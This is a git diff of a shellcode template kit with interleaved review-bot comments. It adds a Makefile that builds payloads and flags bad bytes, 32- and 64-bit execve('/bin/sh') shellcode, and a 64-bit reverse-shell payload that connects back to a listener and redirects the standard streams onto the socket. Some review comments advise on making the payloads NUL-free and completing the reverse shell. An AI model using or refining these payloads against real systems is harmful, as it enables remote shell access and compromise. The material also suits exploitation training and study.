-rw-r--r-- | templates/shellcode/.gitignore | 1 | ||||
-rw-r--r-- | templates/shellcode/Makefile | 38 | ||||
-rw-r--r-- | templates/shellcode/examples/shell32.asm | 16 | ||||
-rw-r--r-- | templates/shellcode/examples/shell64.asm | 24 | ||||
-rw-r--r-- | templates/shellcode/examples/tcp64.asm | 49 | ||||
-rw-r--r-- | templates/shellcode/exit32.asm | 8 | ||||
-rw-r--r-- | templates/shellcode/exit64.asm | 8 | ||||
-rw-r--r-- | templates/shellcode/shell32.asm | 15 | ||||
-rw-r--r-- | templates/shellcode/shell64.asm | 16 | ||||
-rwxr-xr-x | templates/shellcode/shelltool.py | 30 |
10 files changed, 116 insertions, 89 deletions
diff --git a/templates/shellcode/.gitignore b/templates/shellcode/.gitignore
new file mode 100644
index 0000000..e9c55fb
--- /dev/null
+++ b/templates/shellcode/.gitignore
@@ -0,0 +1 @@
+code.*
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
index 2e67adc..757878f 100644
--- a/templates/shellcode/Makefile
+++ b/templates/shellcode/Makefile
@@ -1,17 +1,31 @@
-.PHONY: all
+LDFLAGS?=
+FORMAT?=elf64
+CODE?=examples/shell64.asm
+GREP=00|0a
 
-all: shell32.elf shell64.elf
- @objdump -d shell32.elf | ./shelltool.py
- @objdump -d shell64.elf | ./shelltool.py
+.PHONY: all elf disas
 
-shell32.o: shell32.asm
- nasm -f elf shell32.asm -o shell32.o
+# Format bytecode as an escaped string, highlight bad bytes
+all: code.bin
+ @xxd -i -c 16 <code.bin \ | sed 's/,//g;s/ 0/\\/g;s/^ */"/g;s/$$/"/g' \ | grep --color=always -E '$(GREP)|$$'
 
-shell32.elf: shell32.o
- ld -melf_i386 shell32.o -o shell32.elf
+elf: code.o
+ ld $(LDFLAGS) code.o -o code.elf
 
-shell64.o: shell64.asm
- nasm -f elf64 shell64.asm -o shell64.o
+disas: code.o
+ @objdump -d code.o \ | grep --color=always -E '$(GREP)|$$'
 
-shell64.elf: shell64.o
- ld shell64.o -o shell64.elf
+code.bin: code.o
+ objcopy -O binary code.o code.bin
+
+code.o: code.asm
+ nasm -f '$(FORMAT)' code.asm -o code.o
+
+code.asm:
+ cp '$(CODE)' code.asm
+
+
+# -melf_i386
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
new file mode 100644
index 0000000..6238469
--- /dev/null
+++ b/templates/shellcode/examples/shell32.asm
@@ -0,0 +1,16 @@
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
+
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
new file mode 100644
index 0000000..3812c33
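Review bot: `code.asm:` has no prerequisite, so once code.asm exists a different `CODE=` or an edited example is silently ignored and the stale copy keeps being assembled; declare the selected source as a dependency, `code.asm: $(CODE)`, so the copy reruns whenever the example changes. The dangling `# -melf_i386` comment at the end would be more useful as the 32-bit invocation it hints at, `# 32-bit: make FORMAT=elf LDFLAGS=-melf_i386 CODE=examples/shell32.asm`. Note also that the new example files in this commit no longer declare `_start`, so `make elf` will presumably warn about a missing entry symbol and default to the start of .text — harmless for a flat blob, but worth a one-line comment on the `elf` target.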
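Review bot: The pushed path is `/bin//sh`, not `/bin/sh` as the execve comment says; the doubled slash is what keeps the two 4-byte immediates `0x68732f2f` and `0x6e69622f` free of NUL padding, and that should be stated since it is the reason the encoding has no 00 bytes: `; push "/bin//sh" — the extra slash pads the path to exactly 8 bytes so no NUL appears in the immediates`. The file also selects 32-bit mode only implicitly through `-f elf`; with `-f bin` nasm defaults to 16-bit and would mis-encode every instruction, so a leading `bits 32` makes the template safe under any FORMAT the Makefile is given.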
--- /dev/null
+++ b/templates/shellcode/examples/shell64.asm
@@ -0,0 +1,24 @@
+; Originally based on https://www.exploit-db.com/shellcodes/47008
+
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
+
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
deleted file mode 100644
index 559c89c..0000000
--- a/templates/shellcode/exit32.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
- xor ebx, ebx
- xor eax, eax
- mov al, 0x1
- int 0x80
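Review bot: The file selects 64-bit mode only implicitly through the assembler's `-f elf64` output format; since the Makefile lets FORMAT be overridden, assembling this with `-f bin` would default to 16-bit and emit garbage, so add `bits 64` as the first line. The magic number on `mov al, 59` would read better as a named constant that does not change the encoding, `SYS_EXECVE equ 59` followed by `mov al, SYS_EXECVE`. The execve comment says `/bin/sh` while the immediate `0x68732f2f6e69622f` is `/bin//sh`; a short note that the doubled slash pads the path to 8 bytes without a NUL avoids confusion for anyone editing the path.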
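Review bot: Execution falls off the end of the blob after the third dup2 — there is no execve and no exit — so on its own this payload connects back, redirects the three fds, and then runs whatever bytes happen to follow it in memory; if it is meant to be concatenated with shell64.asm, say so at the top (`; NOTE: no execve here — append shell64.asm to spawn the shell`), otherwise append the execve sequence after the last syscall. The sockaddr literal on `mov rbx, 0x0100007f901f0002` also encodes three NUL bytes (the high byte of sin_family and two octets of 127.0.0.1), so despite the xor/mov-al idioms elsewhere this is not a NUL-free payload and the Makefile's GREP highlight will flag it; `mov rbx, ~0x0100007f901f0002` followed by `not rbx` pushes the same struct with no 00 or 0a byte in the encoding. Neither connect nor the dup2 calls check rax, which is normal for shellcode but deserves a one-line comment, since a refused connection leaves the upper bytes of rax set and `mov al, 33` then no longer yields syscall 33.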
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
deleted file mode 100644
index fb899a2..0000000
--- a/templates/shellcode/exit64.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
- xor rdi, rdi
- mov al, 0x3c
- cdq
- syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
deleted file mode 100644
index 5ff2e12..0000000
--- a/templates/shellcode/shell32.asm
+++ /dev/null
@@ -1,15 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
deleted file mode 100644
index 2353b6f..0000000
--- a/templates/shellcode/shell64.asm
+++ /dev/null
@@ -1,16 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/47008
-
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
deleted file mode 100755
index b95a8cd..0000000
--- a/templates/shellcode/shelltool.py
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env python
-
-# This script will convert shellcode disassembly into an escaped string literal
-# and warn about problematic bytes in the payload.
-# objdump -d elf | ./shelltool.py
-
-import sys
-
-name = None
-bytecode = []
-badchars = [ 0x00, 0x0a ]
-
-for line in sys.stdin:
- for tok in line.split():
- if name is None:
- name = tok
- if len(tok) == 2:
- try:
- bytecode.append(int(tok, base=16))
- except:
- pass
-
-result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
-result = f'{name}"{result}"'
-
-for x in badchars:
- if x in bytecode:
- result += f' **0x{"%02x"%(x)} detected**'
-
-print(result) |